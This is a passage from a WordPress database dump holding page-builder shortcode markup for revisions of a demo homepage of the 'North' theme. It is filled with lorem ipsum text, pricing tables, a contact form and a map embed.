link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710051477{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710059782{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506362110{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454282439{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1d1e20 !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774002317{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582ad748-b8d0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582ad748-b8d0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582ad748-b8d0\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454247199{background-color: #202123 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home10','','inherit','closed','closed','','745-revision-v1','','','2014-07-15 19:42:33','2014-07-15 19:42:33','',745,'http://highperformingstudent.com/2014/07/15/745-revision-v1/',0,'revision','',0),(753,1,'2014-07-15 20:01:35','2014-07-15 20:01:35','[vc_row css=\".vc_custom_1405457897351{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"false\" bg_overlay=\"dots_dark\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"The goods you need now\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710070153{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710078643{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710087331{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506397651{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774017224{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582a0add-8af2\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582a0add-8af2\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582a0add-8af2\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean 